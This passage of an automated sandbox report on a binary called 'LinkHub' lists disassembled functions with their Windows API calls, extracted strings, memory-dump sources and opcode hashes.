                                                                    • Instruction ID: a4c9ffdc260c42e6c7e5647536e7e5ff35d6855f22a43bbe2699286ccf01850e
                                                                    • Opcode Fuzzy Hash: cfd5dbdd449a47aa082560cffbea178e06eeb339515294006a43558130011654
                                                                    • Instruction Fuzzy Hash: 17E06DB19522247BDB205BA2AC4DEEBFF6CEF42BA1F400056F109D2080DAA0C940C2F0
                                                                    APIs
                                                                      • Part of subcall function 00241F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00241F87
                                                                      • Part of subcall function 00241F2D: SelectObject.GDI32(?,00000000), ref: 00241F96
                                                                      • Part of subcall function 00241F2D: BeginPath.GDI32(?), ref: 00241FAD
                                                                      • Part of subcall function 00241F2D: SelectObject.GDI32(?,00000000), ref: 00241FD6
                                                                    • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 002D92E3
                                                                    • LineTo.GDI32(?,?,?), ref: 002D92F0
                                                                    • EndPath.GDI32(?), ref: 002D9300
                                                                    • StrokePath.GDI32(?), ref: 002D930E
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                    • String ID:
                                                                    • API String ID: 1539411459-0
                                                                    • Opcode ID: fb21889171e5a2a88010f1bc6a89c5b36de90d60b4b7753aa05f81205b4f6c07
                                                                    • Instruction ID: c40d2aca14652bd39c6e5e620f0c0ec8839cb94ecc7a7e0bb3629672117a9283
                                                                    • Opcode Fuzzy Hash: fb21889171e5a2a88010f1bc6a89c5b36de90d60b4b7753aa05f81205b4f6c07
                                                                    • Instruction Fuzzy Hash: 31F0BE31012659BADB121F54AC0EFCE3F59AF0A321F008002FA15210E1C37599728FE5
                                                                    APIs
                                                                    • GetSysColor.USER32(00000008), ref: 002421BC
                                                                    • SetTextColor.GDI32(?,?), ref: 002421C6
                                                                    • SetBkMode.GDI32(?,00000001), ref: 002421D9
                                                                    • GetStockObject.GDI32(00000005), ref: 002421E1
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Color$ModeObjectStockText
                                                                    • String ID:
                                                                    • API String ID: 4037423528-0
                                                                    • Opcode ID: fe5f22224c33e8c6dc26c696d689286e1eec2e8b3c5d0c6b2d784869845f80c1
                                                                    • Instruction ID: e3440bd8b88a8803e9ae6e6b5439ca33d5342c161a7ec3b73653e33fcc7bd910
                                                                    • Opcode Fuzzy Hash: fe5f22224c33e8c6dc26c696d689286e1eec2e8b3c5d0c6b2d784869845f80c1
                                                                    • Instruction Fuzzy Hash: 9AE06531641641AADB215F74BC0D7E93B11EB15735F04821AF7FE540E0C7718A509B10
                                                                    APIs
                                                                    • GetDesktopWindow.USER32 ref: 0029EC36
                                                                    • GetDC.USER32(00000000), ref: 0029EC40
                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0029EC60
                                                                    • ReleaseDC.USER32(?), ref: 0029EC81
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 2889604237-0
                                                                    • Opcode ID: f72869dc003e811590e97e4949e2eadaa0719afe3c5f5692f4dec68b84dd3952
                                                                    • Instruction ID: cf0a305475672189bf5e25763f0b2cc9cc83a0516dc1c385b48f234241e23ddb
                                                                    • Opcode Fuzzy Hash: f72869dc003e811590e97e4949e2eadaa0719afe3c5f5692f4dec68b84dd3952
                                                                    • Instruction Fuzzy Hash: B8E01A74C15604DFCF409FA0E90CA5DBBB9FB48311F11844AE84AE3250CB7899519F80
                                                                    APIs
                                                                    • GetDesktopWindow.USER32 ref: 0029EC4A
                                                                    • GetDC.USER32(00000000), ref: 0029EC54
                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0029EC60
                                                                    • ReleaseDC.USER32(?), ref: 0029EC81
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 2889604237-0
                                                                    • Opcode ID: 313dd2c134de5745bdf6ea8d71a9d5d7446fb34a60f90984d6dea5ec85a73851
                                                                    • Instruction ID: c7e5eaf21bbd2b5c8b3c7119aefd36b5132c236f47ce7b31553db7b081afc452
                                                                    • Opcode Fuzzy Hash: 313dd2c134de5745bdf6ea8d71a9d5d7446fb34a60f90984d6dea5ec85a73851
                                                                    • Instruction Fuzzy Hash: 73E012B8C01604EFCF409FA0E80CA5DBBB9FB48311F11844AE80AE3250CB78AA119F80
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: LoadString
                                                                    • String ID: @COM_EVENTOBJ$bn*
                                                                    • API String ID: 2948472770-4108809026
                                                                    • Opcode ID: a28c2f160abd92f9ea0b0efb715ef82dafdf6ea4e6cbe920a344315958a9de60
                                                                    • Instruction ID: f63ad02c5bf91f6bd3cc6535a96dff67b4f75d493d6a1011857a9efcef494ff4
                                                                    • Opcode Fuzzy Hash: a28c2f160abd92f9ea0b0efb715ef82dafdf6ea4e6cbe920a344315958a9de60
                                                                    • Instruction Fuzzy Hash: D7F1AE70A283019FDB24DF14C881B6AB7E1BF84704F14885DF59A9B261D771EEA5CF82
                                                                    APIs
                                                                      • Part of subcall function 002605B2: EnterCriticalSection.KERNEL32(0031170C,?,00000000,?,0024D22A,00313570,00000001,00000000,?,?,002BF023,?,?,00000000,00000001,?), ref: 002605BD
                                                                      • Part of subcall function 002605B2: LeaveCriticalSection.KERNEL32(0031170C,?,0024D22A,00313570,00000001,00000000,?,?,002BF023,?,?,00000000,00000001,?,00000001,00312430), ref: 002605FA
                                                                      • Part of subcall function 0024B329: _wcslen.LIBCMT ref: 0024B333
                                                                      • Part of subcall function 00260413: __onexit.LIBCMT ref: 00260419
                                                                    • __Init_thread_footer.LIBCMT ref: 002C8658
                                                                      • Part of subcall function 00260568: EnterCriticalSection.KERNEL32(0031170C,00000000,?,0024D258,00313570,002827C9,00000001,00000000,?,?,002BF023,?,?,00000000,00000001,?), ref: 00260572
                                                                      • Part of subcall function 00260568: LeaveCriticalSection.KERNEL32(0031170C,?,0024D258,00313570,002827C9,00000001,00000000,?,?,002BF023,?,?,00000000,00000001,?,00000001), ref: 002605A5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                    • String ID: Variable must be of type 'Object'.$bn*
                                                                    • API String ID: 535116098-2794218507
                                                                    • Opcode ID: 3517dbbcb299d0f73457f5478851796486eb99699a1bfe28b59365e7be0060d7
                                                                    • Instruction ID: 1f1e0466b6442674825e038cc5d211d1875fad1ce97cdbfd1b0771bcfccf4b46
                                                                    • Opcode Fuzzy Hash: 3517dbbcb299d0f73457f5478851796486eb99699a1bfe28b59365e7be0060d7
                                                                    • Instruction Fuzzy Hash: CC917D74A20209EFDB05EF54D891EADB7B5BF08300F50825DF9066B292DB71AE65CF50
                                                                    APIs
                                                                      • Part of subcall function 002441EA: _wcslen.LIBCMT ref: 002441EF
                                                                    • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 002B5919
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Connection_wcslen
                                                                    • String ID: *$LPT
                                                                    • API String ID: 1725874428-3443410124
                                                                    • Opcode ID: 950eacd1ca779123db1b93b05cacfc1bdb9cb4ff2762759ab1e1746019a156f4
                                                                    • Instruction ID: 9f92d7ef569d45417e1ed8641b53db96f64f8ba39e46362baf7fe500a77ee557
                                                                    • Opcode Fuzzy Hash: 950eacd1ca779123db1b93b05cacfc1bdb9cb4ff2762759ab1e1746019a156f4
                                                                    • Instruction Fuzzy Hash: 71919A74A20615DFCB14DF54C494FAABBF1AF44344F188099E84AAF362C771EE95CB90
                                                                    APIs
                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 002A58AF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ContainedObject
                                                                    • String ID: 0$1$Container
                                                                    • API String ID: 3565006973-523372106
                                                                    • Opcode ID: c706cbde3618c8e7e2166ace2d5b3d63cb614a9fa0ede4adc39ab48ad9ddbc5d
                                                                    • Instruction ID: c352975688f2a86cfdd8164e7609c6ecaec66eb5fe7c9eee7a22313e0561ee8a
                                                                    • Opcode Fuzzy Hash: c706cbde3618c8e7e2166ace2d5b3d63cb614a9fa0ede4adc39ab48ad9ddbc5d
                                                                    • Instruction Fuzzy Hash: 76814870610612EFDB14DF54C884A6ABBF8FF49710F20856EF94A8B2A1DBB0E855CB50
                                                                    APIs
                                                                    • __startOneArgErrorHandling.LIBCMT ref: 0026E67D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorHandling__start
                                                                    • String ID: pow
                                                                    • API String ID: 3213639722-2276729525
                                                                    • Opcode ID: 0106f368116a1dfefda309de1a24b772fbd112641e73b3edb88e7bfaa2314204
                                                                    • Instruction ID: f5318328449d85058dcb5658f827b642214b0bcf5f231559e87f4f1b4d80a43b
                                                                    • Opcode Fuzzy Hash: 0106f368116a1dfefda309de1a24b772fbd112641e73b3edb88e7bfaa2314204
                                                                    • Instruction Fuzzy Hash: 2951BB65EB810386CF12BF14DD4936A2BA8AB10701F31CD58F09D862E9EF758CF59A46
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #
                                                                    • API String ID: 0-1885708031
                                                                    • Opcode ID: d8c884a31d8f7c99d3a5b63a5fb7bf641df328879d32a03af3cafcba509b7caf
                                                                    • Instruction ID: d83548e83ebe8fefca940d0ef8f077c585477348f7db7fccd92d4ea0db6dd559
                                                                    • Opcode Fuzzy Hash: d8c884a31d8f7c99d3a5b63a5fb7bf641df328879d32a03af3cafcba509b7caf
                                                                    • Instruction Fuzzy Hash: 0A514131524257DFCF25DF28C442ABA7BA4EF16310F694169FC919B2C0DB309DA6CBA1
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000), ref: 0025F6DB
                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 0025F6F4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: GlobalMemorySleepStatus
                                                                    • String ID: @
                                                                    • API String ID: 2783356886-2766056989
                                                                    • Opcode ID: 51a8a9e78dd22793653b93192d8c434668fe5de1a953cc78490c7feef99f3e17
                                                                    • Instruction ID: 6eb12518ed1973620a5024fdf039387bf05c50f24a41f2573d1a1758f863c515
                                                                    • Opcode Fuzzy Hash: 51a8a9e78dd22793653b93192d8c434668fe5de1a953cc78490c7feef99f3e17
                                                                    • Instruction Fuzzy Hash: 375138724287489BE320AF10DC86BAFB7E8FB95310F82485DF1D951191DF708579CB66
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 002BDB75
                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 002BDB7F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CrackInternet_wcslen
                                                                    • String ID: |
                                                                    • API String ID: 596671847-2343686810
                                                                    • Opcode ID: 369737bf36631982f50316e0d3aced5b846b35346e8249dd302d85672a7982a9
                                                                    • Instruction ID: cf8de765d660f192103da797542b21365d833bb25374d5b2b4c5e92961a87cd9
                                                                    • Opcode Fuzzy Hash: 369737bf36631982f50316e0d3aced5b846b35346e8249dd302d85672a7982a9
                                                                    • Instruction Fuzzy Hash: 98316F71C21119ABCF05DFA0CC859EEBFB9FF04354F100025F915A6162EB719966CF50
                                                                    APIs
                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 002D40BD
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 002D40F8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$DestroyMove
                                                                    • String ID: static
                                                                    • API String ID: 2139405536-2160076837
                                                                    • Opcode ID: d88f19053ac7249e5c681ed6b456a5af07adb1b361e91cd0c36b6af533f01744
                                                                    • Instruction ID: 7243a3473f9911227e3b859bb8a45e514efec622f09851f50a1fb4d6c2157d25
                                                                    • Opcode Fuzzy Hash: d88f19053ac7249e5c681ed6b456a5af07adb1b361e91cd0c36b6af533f01744
                                                                    • Instruction Fuzzy Hash: 44319271520604ABDB14DF74CC40BFB73ADFF48714F00861AF9A587290DA71ACA1DB60
                                                                    APIs
                                                                    • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 002D50BD
                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002D50D2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: '
                                                                    • API String ID: 3850602802-1997036262
                                                                    • Opcode ID: ffb17b838ac817d1b7f1e35af2297df5378005877727a111b5e70452a5c0dabb
                                                                    • Instruction ID: 3e50a812b7a4c6485fc02f423041311593bf190d70a689f5e20e6e5f0377c4d4
                                                                    • Opcode Fuzzy Hash: ffb17b838ac817d1b7f1e35af2297df5378005877727a111b5e70452a5c0dabb
                                                                    • Instruction Fuzzy Hash: 7D313874A1161A9FDB14CF69C880BDABBB5FF49301F10406AE904AB351D7B1AD65CF90
                                                                    APIs
                                                                      • Part of subcall function 0024249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002424B0
                                                                      • Part of subcall function 00242234: GetWindowLongW.USER32(?,000000EB), ref: 00242242
                                                                    • GetParent.USER32(?), ref: 00283440
                                                                    • DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 002834CA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: LongWindow$ParentProc
                                                                    • String ID: (1
                                                                    • API String ID: 2181805148-3903994380
                                                                    • Opcode ID: 06b4b9f21e29d75d51f73a6f0e130dc577c5e8ae9929a28e38a051bdf0422e8b
                                                                    • Instruction ID: 9c908b39be936c01e0e93b606b3719c73f9366f783e92a1bd46eb6e8cfb119db
                                                                    • Opcode Fuzzy Hash: 06b4b9f21e29d75d51f73a6f0e130dc577c5e8ae9929a28e38a051bdf0422e8b
                                                                    • Instruction Fuzzy Hash: 5D21A235612155EFCB2AEF69C849DB53B66EF09360F544244F6290B2E2C3718E79DB10
                                                                    APIs
                                                                      • Part of subcall function 00247873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 002478B1
                                                                      • Part of subcall function 00247873: GetStockObject.GDI32(00000011), ref: 002478C5
                                                                      • Part of subcall function 00247873: SendMessageW.USER32(00000000,00000030,00000000), ref: 002478CF
                                                                    • GetWindowRect.USER32(00000000,?), ref: 002D4216
                                                                    • GetSysColor.USER32(00000012), ref: 002D4230
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                    • String ID: static
                                                                    • API String ID: 1983116058-2160076837
                                                                    • Opcode ID: dfdd5397bdacd3acb74c4db2c7361d88432eaf49f0ef9f576d73a1ddc6ed9d81
                                                                    • Instruction ID: a1dcbb26c6829e25636c4d10ed16aae04e6976862983d1a8bbfa32f2b68d27b4
                                                                    • Opcode Fuzzy Hash: dfdd5397bdacd3acb74c4db2c7361d88432eaf49f0ef9f576d73a1ddc6ed9d81
                                                                    • Instruction Fuzzy Hash: C711F97262060AAFDB01DFA8DC49AEA7BB8EB08314F014516FD55D3250D675E8619B60
                                                                    APIs
                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 002BD7C2
                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 002BD7EB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$OpenOption
                                                                    • String ID: <local>
                                                                    • API String ID: 942729171-4266983199
                                                                    • Opcode ID: 6fd6ae4c54cd8dccb4f551bb6c7e30b75b9290776edbb0d29d386ec48d996d3e
                                                                    • Instruction ID: 1be575f2be819e09b8d2064d44b838b0a27c37bc38392650abe708eda6fd6fb1
